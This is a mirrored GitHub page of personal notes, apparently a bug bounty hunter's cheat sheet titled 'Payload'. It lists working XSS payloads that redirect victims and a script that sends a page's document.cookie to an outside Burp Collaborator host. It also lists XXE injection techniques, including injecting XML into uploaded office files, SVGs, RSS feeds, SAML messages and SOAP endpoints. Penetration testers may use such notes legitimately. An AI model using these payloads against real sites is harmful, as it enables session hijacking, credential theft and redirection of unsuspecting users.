Giters

anmolksachan / Payload

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

My Notes - Payload

XSS to Open Redirection Payload:

  1. http://Test"><img src=x onload=window.location="http://google.com">
  2. "><img src=x onerror=window.location="http://google.com">
  3. /auth/v2/login/signed_in?return_to=javascripT:alert(document/**/.domain);

Exfiltrate cookie:

<script>fetch('https://anmol.burpcollaborator.net?'+document.cookie, {method: 'POST',mode: 'no-cors',body:document.cookie});alert('exfiltrated the document.cookie');</script>

Multi XSS Exploit in Upload File

  1. Multi XSS Exploit in Upload File

Tiny XSS

  1. Tiny XSS by @terjanq

Server-Side input validation testing

  1. Server-Side input validation testing

XXE Techniques [Observations]

  1. Convert the content type from "application/json"/"application/x-www-form-urlencoded" to "application/xml".
  2. File Uploads allows for docx/xlcs/pdf/zip , unzip the package and add your evil xml code into the xml files.
  3. If svg allowed in picture upload , you can inject xml in svgs.
  4. If the web app offers RSS feeds , add your malicious code into the RSS.
  5. Fuzz for /soap api , some applications still running soap apis
  6. If the target web app allows for SSO integration, you can inject your malicious xml code in the SAML request/response
  7. For more: A Deep Dive into XXE Injection

XXE OOB

  1. SOAP- Based Unauthenticated Out-of-Band XML External Entity (OOB-XXE) in a Help Desk Software
  2. Soap-based XXE vulnerability /soapserver/

Resources

  1. https://github.com/xsuperbug/payloads/blob/master/XSS%20-2
  2. https://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava-FavoriteXSS-SLIDES.pdf

About

Languages

Language:HTML 100.0%